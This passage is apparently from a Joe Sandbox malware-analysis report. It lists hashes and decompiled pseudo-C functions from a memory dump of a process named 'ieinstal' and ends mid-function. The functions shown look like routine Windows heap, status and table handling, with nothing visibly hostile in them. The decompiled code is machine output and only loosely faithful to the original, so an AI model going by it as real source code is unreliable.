Instruction ID: 8a8adc8635356124801607ba548f477fdbf5143352d4a9206b474ee8155556ca
Opcode Fuzzy Hash: 23b9f5b41e8ac634e7b91feb8d7c05028b3a117a9f2cd735b6b15d3fedf179ef
Instruction Fuzzy Hash: 3741BC7A6083529BC320DF29C860B5BBAE4FF44750F154A2AFC959B290E721EC45CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 1EFC0C79 Relevance: .1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E1EFC0C79(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x1f0bb370 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E1F008F40( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x1f0b5da8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E1F0045E0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = E1EFD5D90(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E1EFEABA0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E1F004B50(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E1F008870(_t67 + 0xc, 0x1ef951e0, 0x10) == 0) {
								 *0x1f0b41d0 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E1EFC0D9F(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E1EFC0FB0(0xa0, _t64, 0x1f0b6880, E1EFC1CD0, 0, 0) != 0) {
					_t46 = E1EFEABA0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}

0x1efc0c79
0x1efc0c8b
0x1efc0c91
0x1efc0c96
0x1efc0ca3
0x1efc0caa
0x1efc0caf
0x1efc0cb5
0x1efc0cbd
0x1efc0cca
0x1efc0ccc
0x1efc0ceb
0x1efc0cee
0x1efc0cf5
0x1efc0cf6
0x1efc0cf7
0x1efc0cf8
0x1efc0cf9
0x1efc0cff
0x1efc0d06
0x1efc0d0a
0x1efc0d13
0x1efc0d1c
0x1efc0d1d
0x1efc0d1e
0x1efc0d1f
0x1efc0d24
0x1efc0d25
0x1efc0d27
0x1efc0d31
0x00000000
0x00000000
0x1f01f0d3
0x1f01f0e1
0x1f01f0e1
0x1f01f0f4
0x1f01f0fe
0x1f01f103
0x1f01f109
0x1f01f110
0x00000000
0x1f01f116
0x1f01f116
0x00000000
0x1f01f116
0x1f01f110
0x1efc0d39
0x1f01f126
0x1f01f12a
0x1efc0d70
0x1efc0d77
0x1f01f137
0x1f01f149
0x1f01f149
0x1f01f137
0x1efc0d7d
0x1efc0d7f
0x1efc0d8d
0x1efc0d8d
0x1efc0d41
0x1efc0d41
0x1efc0d47
0x1efc0d4d
0x1efc0d93
0x00000000
0x00000000
0x1efc0d59
0x1efc0d6e
0x1efc0d97
0x1efc0d97
0x00000000
0x1efc0d6e
0x1efc0d4f
0x1efc0d4f
0x1efc0d54
0x00000000
0x1efc0d54
0x1efc0d3f
0x00000000
0x1efc0d3f
0x1efc0ce3
0x1f01f0c2
0x00000000
0x1efc0ce9
0x1efc0ce9
0x00000000
0x1efc0ce9

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8ab475dde03c8733280f961b55d66bff2b43416e42fef39a4d84e3a8e538a88
Instruction ID: d0b05dd51f6242808573b4e2bef9dbdf0b6e2cc64234bcd1473a6a9859e3ef33
Opcode Fuzzy Hash: c8ab475dde03c8733280f961b55d66bff2b43416e42fef39a4d84e3a8e538a88
Instruction Fuzzy Hash: 46411575A007559FEB21DF24CCA0F9A77F9AB41344F10069AEC459B280DB71FE41CB51

Uniqueness

Uniqueness Score: -1.00%

Function 1EFC0AED Relevance: .1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E1EFC0AED(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x1f0bb370 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					L1EFEAB30(_t86);
					L11:
					return E1F004B50(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xd2ff771b
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x1f0b6698
				L1EFD2330(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E1F008F40( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x8850ba00
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E1F0045E0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = E1EFD5D90(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E1EFEABA0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x1f0b6698
								E1EFD24D0(_t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E1EFC0D9F(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}

0x1efc0aed
0x1efc0aff
0x1efc0b02
0x1efc0b06
0x1efc0b0d
0x1efc0b19
0x1f01ebdb
0x1f01ebdd
0x1efc0c0a
0x1efc0c0b
0x1efc0bf7
0x1efc0c07
0x1efc0c07
0x1efc0b1f
0x1efc0b25
0x00000000
0x00000000
0x1efc0b2b
0x1efc0b2f
0x00000000
0x00000000
0x1efc0b35
0x1efc0b39
0x1efc0b46
0x1efc0b4b
0x1efc0b57
0x1efc0b5c
0x1efc0b5f
0x1efc0b65
0x1efc0b73
0x1efc0b7d
0x1efc0b80
0x1efc0b83
0x1efc0b87
0x1efc0b8d
0x1efc0b93
0x1efc0b94
0x1efc0b95
0x1efc0b96
0x1efc0b9b
0x1efc0b9c
0x1efc0ba3
0x1efc0bab
0x00000000
0x00000000
0x1f01eb53
0x1f01eb61
0x1f01eb61
0x1f01eb7c
0x1f01eb84
0x1f01eb8c
0x1f01ebab
0x00000000
0x1f01eb8e
0x1f01eb94
0x1f01eb95
0x1f01eb9e
0x1f01ebb0
0x1f01ebb6
0x1f01ebba
0x1efc0bd4
0x1efc0bd4
0x1efc0bd8
0x1efc0bdc
0x1efc0be3
0x1f01ebd1
0x1f01ebd1
0x1efc0bf5
0x00000000
0x00000000
0x00000000
0x00000000
0x1efc0bf5
0x1efc0bb9
0x1efc0bbe
0x1efc0bc9
0x1efc0bcb
0x1efc0bcf
0x1efc0bcf
0x00000000
0x1efc0bc9
0x1f01eba0
0x00000000
0x1f01eba0
0x1f01eb8c
0x1efc0bb3
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f6e814580f88facd97c9363b834db361fe6530f100014f372db6dcd766a4af7
Instruction ID: c87cb93faba7d7c06327e1374e2597b31f8006895129ee97c4b4ebfd9fcd7ec8
Opcode Fuzzy Hash: 6f6e814580f88facd97c9363b834db361fe6530f100014f372db6dcd766a4af7
Instruction Fuzzy Hash: 7141C039A00269DBCB21DF64C8A0FDEB7B4FF45740F0105A6E949AB241DB74EE85CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1EFC8B10 Relevance: .1, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E1EFC8B10(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t37;
				intOrPtr _t49;
				intOrPtr _t55;
				intOrPtr _t61;
				void* _t63;
				signed int _t67;
				intOrPtr* _t68;
				intOrPtr _t71;
				void* _t73;
				signed int _t76;
				void* _t77;
				void* _t79;
				void* _t81;
				void* _t88;
				void* _t90;

				_push(0x14);
				_push(0x1f09be78);
				E1F017BE4(__ebx, __edi, __esi);
				_t79 = 0;
				 *((intOrPtr*)(_t81 - 0x1c)) = 0;
				_t61 =  *((intOrPtr*)(_t81 + 8));
				if(_t61 == 0) {
					_t37 = 0xc000000d;
					L15:
					 *[fs:0x0] =  *((intOrPtr*)(_t81 - 0x10));
					return _t37;
				}
				E1EFC8CC4(_t63);
				E1EFCFED0(0x1f0b4f20);
				 *((intOrPtr*)(_t81 - 4)) = 0;
				_t76 = 0;
				 *(_t81 - 0x20) = 0;
				_t71 =  *0x1f0b4f38; // 0x3386db8
				while(1) {
					_t88 = _t76 -  *0x1f0b4f3c; // 0x0
					if(_t88 >= 0) {
						break;
					}
					__eflags =  *((intOrPtr*)(_t76 * 0x18 + _t71)) - _t61;
					if(__eflags == 0) {
						E1EFC89C0(_t61, _t76, _t79, __eflags, _t61, _t79, _t79, _t79);
						_t71 =  *0x1f0b4f38; // 0x3386db8
					}
					_t76 = _t76 + 1;
					 *(_t81 - 0x20) = _t76;
				}
				if(_t71 == 0) {
					_t71 = E1EFD5D90(_t63,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x300);
					__eflags = _t71;
					if(_t71 == 0) {
						L22:
						 *((intOrPtr*)(_t81 - 0x1c)) = 0xc0000017;
						_t77 =  *((intOrPtr*)(_t81 + 0xc));
						L11:
						 *((intOrPtr*)(_t81 - 4)) = 0xfffffffe;
						E1EFC8C6E();
						if( *((intOrPtr*)(_t81 - 0x1c)) >= 0 && _t77 != 0) {
							E1EFC8C79(_t61, _t77);
						}
						_t37 =  *((intOrPtr*)(_t81 - 0x1c));
						goto L15;
					}
					 *0x1f0b4f38 = _t71;
					 *0x1f0b4f04 = 0x20;
					L5:
					_t77 =  *((intOrPtr*)(_t81 + 0xc));
					if(_t77 == 0) {
						L10:
						_t67 =  *0x1f0b4f3c * 0x18;
						 *((intOrPtr*)(_t67 + _t71)) = _t61;
						 *((intOrPtr*)(_t67 + _t71 + 4)) = _t79;
						 *((intOrPtr*)(_t67 + _t71 + 8)) =  *((intOrPtr*)(_t81 + 0x10));
						 *((intOrPtr*)(_t67 + _t71 + 0xc)) =  *((intOrPtr*)(_t81 + 0x14));
						 *((intOrPtr*)(_t67 + _t71 + 0x10)) = 1;
						 *((intOrPtr*)(_t67 + _t71 + 0x14)) =  *((intOrPtr*)(_t81 + 0x18));
						 *0x1f0b4f3c =  *0x1f0b4f3c + 1;
						goto L11;
					}
					_t68 = _t77;
					_t73 = _t68 + 2;
					do {
						_t49 =  *_t68;
						_t68 = _t68 + 2;
					} while (_t49 != _t79);
					_t70 = _t68 - _t73 >> 1;
					 *((intOrPtr*)(_t81 - 0x24)) = (_t68 - _t73 >> 1) + (_t68 - _t73 >> 1);
					_t79 = E1EFD5D90(_t70,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, (_t68 - _t73 >> 1) + (_t68 - _t73 >> 1) + 2);
					if(_t79 == 0) {
						 *((intOrPtr*)(_t81 - 0x1c)) = 0xc0000017;
						goto L11;
					}
					E1F0088C0(_t79, _t77,  *((intOrPtr*)(_t81 - 0x24)));
					_t71 =  *0x1f0b4f38; // 0x3386db8
					goto L10;
				}
				_t55 =  *0x1f0b4f04; // 0x20
				_t90 =  *0x1f0b4f3c - _t55; // 0x0
				if(_t90 >= 0) {
					_t71 = E1EFD2710( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t71, (_t55 + 0x20) * 0x18);
					__eflags = _t71;
					if(_t71 == 0) {
						goto L22;
					}
					 *0x1f0b4f38 = _t71;
					 *0x1f0b4f04 =  *0x1f0b4f04 + 0x20;
				}
				goto L5;
			}

0x1efc8b10
0x1efc8b12
0x1efc8b17
0x1efc8b1c
0x1efc8b1e
0x1efc8b21
0x1efc8b26
0x1f0221b1
0x1efc8c13
0x1efc8c16
0x1efc8c22
0x1efc8c22
0x1efc8b2c
0x1efc8b36
0x1efc8b3b
0x1efc8b3e
0x1efc8b40
0x1efc8b43
0x1efc8b49
0x1efc8b49
0x1efc8b4f
0x00000000
0x00000000
0x1efc8c28
0x1efc8c2b
0x1f0221bf
0x1f0221c4
0x1f0221c4
0x1efc8c31
0x1efc8c32
0x1efc8c32
0x1efc8b57
0x1efc8c4f
0x1efc8c51
0x1efc8c53
0x1f0221cf
0x1f0221cf
0x1f0221d6
0x1efc8bf1
0x1efc8bf1
0x1efc8bf8
0x1efc8c01
0x1efc8c0b
0x1efc8c0b
0x1efc8c10
0x00000000
0x1efc8c10
0x1efc8c59
0x1efc8c5f
0x1efc8b6e
0x1efc8b6e
0x1efc8b73
0x1efc8bc0
0x1efc8bc0
0x1efc8bc7
0x1efc8bca
0x1efc8bd1
0x1efc8bd8
0x1efc8bdc
0x1efc8be7
0x1efc8beb
0x00000000
0x1efc8beb
0x1efc8b75
0x1efc8b77
0x1efc8b7a
0x1efc8b7a
0x1efc8b7d
0x1efc8b80
0x1efc8b87
0x1efc8b8c
0x1efc8ba3
0x1efc8ba7
0x1f02220d
0x00000000
0x1f02220d
0x1efc8bb2
0x1efc8bba
0x00000000
0x1efc8bba
0x1efc8b5d
0x1efc8b62
0x1efc8b68
0x1f0221f5
0x1f0221f7
0x1f0221f9
0x00000000
0x00000000
0x1f0221fb
0x1f022201
0x1f022201
0x00000000

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2bcbab38e54354ff4c35fe5fc6c0b3c30be95c3a256098abc0f39dcd6593fff2
Instruction ID: 5189107f32d29ab6b62ec15ed09964ea64b58cf616fc335b4258b3e870980bcc
Opcode Fuzzy Hash: 2bcbab38e54354ff4c35fe5fc6c0b3c30be95c3a256098abc0f39dcd6593fff2
Instruction Fuzzy Hash: D941E77AA00257CFD714CF49C890F9AB7F5FB84724F21862AD9009B651D736E942CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1EFB9FD0 Relevance: .1, Instructions: 122
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1EFB9FD0(intOrPtr _a4, intOrPtr* _a8, char _a12) {
				signed int _v8;
				signed short _v12;
				signed int _v16;
				void* _t31;
				signed int _t35;
				signed short _t37;
				signed int _t38;
				intOrPtr* _t40;
				signed int _t41;
				signed int _t42;
				signed int _t43;
				void* _t48;
				signed int _t49;
				signed short* _t51;
				void* _t52;
				signed short _t54;
				signed int _t55;
				signed int _t56;
				short* _t57;
				intOrPtr _t58;

				_t57 = 0;
				if(_a4 == 0) {
					L34:
					_t58 = 0xc000000d;
					L11:
					if(_t57 != 0) {
						E1EFBA093(_t57);
					}
					L13:
					return _t58;
				}
				_t39 = _a8;
				if(_a8 == 0) {
					goto L34;
				}
				_t52 = 8;
				_t31 = 0x2a;
				_t45 = _t31;
				if(E1EFBA121(_t31, _t52) == 0) {
					_t58 = 0xc0000095;
					goto L13;
				}
				_t57 = E1EFD5D90(_t45,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t32);
				if(_t57 == 0) {
					_t58 = 0xc0000017;
					goto L13;
				} else {
					_t35 = 0x2a;
					_t58 = 0;
					if(E1EFBA0B8(_t35, _t39, _t57, _a4, 0, 0, _t35) == 0) {
						_t58 = 0xc0000001;
					}
					_t54 = 0;
					_t37 = 0;
					_v12 = 0;
					do {
						if(0 == _t37) {
							goto L8;
						}
						_t49 = _t37;
						_v16 = _t49;
						if( *((intOrPtr*)(_t57 + 4 + _t49 * 8)) != _t54) {
							if(0 >= _t37) {
								goto L8;
							}
							_t41 = _t37 & 0x0000ffff;
							_t13 = _t57 + 2; // 0x2
							_t51 = _t13;
							_t38 = _v16;
							_v8 = _t41;
							do {
								if(_t51[1] != _t54) {
									_t55 =  *(_t51 - 2) & 0x0000ffff;
									if(_t55 != 0) {
										_t43 =  *(_t57 + _t38 * 8) & 0x0000ffff;
										if(_t43 == 0) {
											_t41 = _v8;
										} else {
											_t41 = _v8;
											if(_t55 == _t43) {
												_t58 = 0xc0000001;
											}
										}
									}
									_t56 =  *_t51 & 0x0000ffff;
									if(_t56 > 0) {
										_t42 =  *(_t57 + 2 + _t38 * 8) & 0x0000ffff;
										if(_t42 <= 0) {
											_t41 = _v8;
										} else {
											_t41 = _v8;
											if(_t56 == _t42) {
												_t58 = 0xc0000001;
											}
										}
									}
									_t54 = 0;
								}
								_t51 =  &(_t51[4]);
								_t41 = _t41 - 1;
								_v8 = _t41;
							} while (_t41 != 0);
							_t37 = _v12;
						}
						L8:
						_t37 = _t37 + 1;
						_t48 = 0x2a;
						_v12 = _t37;
					} while (_t37 < _t48);
					_t40 = _a8;
					if(_a12 == 1 &&  *_t40 < _t54) {
						_t58 = 0xc0000001;
					}
					goto L11;
				}
			}

0x1efb9fdb
0x1efb9fe0
0x1f01bd61
0x1f01bd61
0x1efba071
0x1efba073
0x1efba077
0x1efba077
0x1efba07d
0x1efba082
0x1efba082
0x1efb9fe6
0x1efb9feb
0x00000000
0x00000000
0x1efb9ff3
0x1efb9ff6
0x1efb9ff7
0x1efba000
0x1f01bcd4
0x00000000
0x1f01bcd4
0x1efba017
0x1efba01b
0x1f01bcde
0x00000000
0x1efba021
0x1efba023
0x1efba025
0x1efba037
0x1efba085
0x1efba085
0x1efba039
0x1efba03b
0x1efba03d
0x1efba040
0x1efba045
0x00000000
0x00000000
0x1efba047
0x1efba04a
0x1efba051
0x1f01bced
0x00000000
0x00000000
0x1f01bcf3
0x1f01bcf6
0x1f01bcf6
0x1f01bcf9
0x1f01bcfc
0x1f01bcff
0x1f01bd02
0x1f01bd04
0x1f01bd0b
0x1f01bd0d
0x1f01bd14
0x1f01bd25
0x1f01bd16
0x1f01bd19
0x1f01bd1c
0x1f01bd1e
0x1f01bd1e
0x1f01bd1c
0x1f01bd14
0x1f01bd28
0x1f01bd2e
0x1f01bd30
0x1f01bd38
0x1f01bd49
0x1f01bd3a
0x1f01bd3d
0x1f01bd40
0x1f01bd42
0x1f01bd42
0x1f01bd40
0x1f01bd38
0x1f01bd4c
0x1f01bd4c
0x1f01bd4e
0x1f01bd51
0x1f01bd54
0x1f01bd54
0x1f01bd59
0x1f01bd59
0x1efba057
0x1efba059
0x1efba05a
0x1efba05b
0x1efba05e
0x1efba067
0x1efba06a
0x1efba08c
0x1efba08c
0x00000000
0x1efba06a

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad424edfe8e79529f681fa3ae27580fe511ad86d63f68dcb329972c4fc4dc83f
Instruction ID: fb8504402fdd199e25a88e028389c93a0eb7df16cbfe96eb23d89ae07b724f6a
Opcode Fuzzy Hash: ad424edfe8e79529f681fa3ae27580fe511ad86d63f68dcb329972c4fc4dc83f
Instruction Fuzzy Hash: 44414771E04A59EBDB08DF2684A07AA73B1EB84795F5A826BDC405F240E736ED448350

Uniqueness

Uniqueness Score: -1.00%

Function 1EFFBB5B Relevance: .1, Instructions: 121
COMMON

Download Yara Rule

C-Code - Quality: 21%

			E1EFFBB5B(void* __ecx, void* __edx, void* __eflags) {
				char _v12;
				char _v20;
				char _v28;
				char _v36;
				char _v44;
				char _v52;
				char _v60;
				char _v68;
				char _v76;
				char _v84;
				char _v88;
				signed char _t30;
				signed char _t31;
				signed int _t35;
				signed char _t61;
				void* _t62;
				void* _t63;
				void* _t64;
				void* _t65;
				void* _t66;
				void* _t67;
				signed char* _t70;
				intOrPtr _t73;

				_t62 = __edx;
				_t73 =  *[fs:0x30];
				_t70 =  *((intOrPtr*)(_t73 + 0x10)) + 0x30;
				E1F005050(__ecx, 0x1f0b4ff8, 0);
				E1F005050(__ecx, 0x1f0b4ff0, 0);
				_t30 =  *((intOrPtr*)(_t73 + 3));
				if((_t30 & 0x00000010) != 0) {
					__eflags =  *_t70;
					if(__eflags == 0) {
						goto L1;
					}
					_t61 =  *_t70;
					 *0x1f0b4ff8 = _t61;
					_t31 = _t70[4];
					 *0x1f0b4ffc = _t31;
					 *0x1f0b4ff4 = _t31;
					_push( &_v84);
					 *0x1f0b391c = 0x29;
					_push( &_v76);
					 *0x1f0b4ff0 = _t61;
					_push( &_v88);
					_t63 = 4;
					_t35 = E1F04D53C(_t63, __eflags);
					__eflags = _t35 | 0x10000000;
					if((_t35 | 0x10000000) < 0) {
						L10:
						E1F04CDB0(0x1000);
						L11:
						_push( &_v68);
						_push( &_v60);
						_push( &_v88);
						_t64 = 7;
						__eflags = E1F04D53C(_t64, __eflags) | 0x10000000;
						if(__eflags >= 0) {
							__eflags = _v88 - 0x70001;
							if(__eflags == 0) {
								 *0x1f0b391c =  *0x1f0b391c | 0x00000002;
								__eflags =  *0x1f0b391c;
							}
						}
						_push( &_v52);
						_push( &_v44);
						_push( &_v88);
						_t65 = 0x13;
						__eflags = E1F04D53C(_t65, __eflags) | 0x10000000;
						if(__eflags >= 0) {
							__eflags = _v88 - 0x130001;
							if(__eflags == 0) {
								 *0x1f0b391c =  *0x1f0b391c | 0x00000040;
								__eflags =  *0x1f0b391c;
							}
						}
						_push( &_v36);
						_push( &_v28);
						_push( &_v88);
						_t66 = 0x20;
						__eflags = E1F04D53C(_t66, __eflags) | 0x10000000;
						if(__eflags >= 0) {
							__eflags = _v88 - 0x200001;
							if(__eflags == 0) {
								 *0x1f0b391c =  *0x1f0b391c | 0x00000004;
								__eflags =  *0x1f0b391c;
							}
						}
						_push( &_v20);
						_push( &_v12);
						_push( &_v88);
						_t67 = 0x36;
						_t30 = E1F04D53C(_t67, __eflags) | 0x10000000;
						__eflags = _t30;
						if(_t30 >= 0) {
							__eflags = _v88 - 0x360001;
							if(_v88 == 0x360001) {
								 *0x1f0b391c =  *0x1f0b391c | 0x00000100;
							}
						}
						L3:
						return _t30;
					}
					__eflags = _v88 - 0x40001;
					if(__eflags == 0) {
						goto L10;
					} else {
						 *0x1f0b391c =  *0x1f0b391c & 0xfffffffe;
						goto L11;
					}
				}
				L1:
				if((_t30 & 0x00000002) != 0) {
					_t30 = 0;
					 *_t70 = 0;
				} else {
					if( *_t70 != 0) {
						_t30 = E1EFFD450(_t62, _t70);
					}
				}
				goto L3;
			}

0x1effbb5b
0x1effbb68
0x1effbb7b
0x1effbb7e
0x1effbb89
0x1effbb8e
0x1effbb93
0x1f0376c5
0x1f0376c8
0x00000000
0x00000000
0x1f0376ce
0x1f0376d0
0x1f0376d6
0x1f0376d9
0x1f0376de
0x1f0376e7
0x1f0376ec
0x1f0376f6
0x1f0376fb
0x1f037701
0x1f037704
0x1f037705
0x1f03770f
0x1f037711
0x1f037726
0x1f03772b
0x1f037730
0x1f037734
0x1f037739
0x1f03773e
0x1f037741
0x1f037747
0x1f037749
0x1f03774b
0x1f037753
0x1f037755
0x1f037755
0x1f037755
0x1f037753
0x1f037760
0x1f037765
0x1f03776a
0x1f03776d
0x1f037773
0x1f037775
0x1f037777
0x1f03777f
0x1f037781
0x1f037781
0x1f037781
0x1f03777f
0x1f03778c
0x1f037791
0x1f037796
0x1f037799
0x1f03779f
0x1f0377a1
0x1f0377a3
0x1f0377ab
0x1f0377ad
0x1f0377ad
0x1f0377ad
0x1f0377ab
0x1f0377b8
0x1f0377bd
0x1f0377c2
0x1f0377c5
0x1f0377cb
0x1f0377cb
0x1f0377cd
0x1f0377d3
0x1f0377db
0x1f0377e1
0x1f0377e1
0x1f0377db
0x1effbba2
0x1effbba8
0x1effbba8
0x1f037713
0x1f03771b
0x00000000
0x1f03771d
0x1f03771d
0x00000000
0x1f03771d
0x1f03771b
0x1effbb99
0x1effbb9b
0x1effbba9
0x1effbbab
0x1effbb9d
0x1effbba0
0x1effbbb1
0x1effbbb1
0x1effbba0
0x00000000

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d982a14139b468489957dd7ba375487fa521ebd801a7d1fc9c322b4686502bbf
Instruction ID: 0e5f23a211f3fa6619553d46292fc6e929ace8f106ec0e1d13d55af461eba9c8
Opcode Fuzzy Hash: d982a14139b468489957dd7ba375487fa521ebd801a7d1fc9c322b4686502bbf
Instruction Fuzzy Hash: 8D41E67A909346AFD311DF51C890BAB73ECEB44765F10892AEDA1D2140D770EA48DFA2

Uniqueness

Uniqueness Score: -1.00%

Function 1F08BA66 Relevance: .1, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E1F08BA66(signed int* __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				void* _t68;
				signed int* _t80;
				signed int _t83;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t80 = __ecx;
				_t83 = E1F08B9DD(__ecx, __edx);
				_v12 = _t83;
				if(_t83 != 0) {
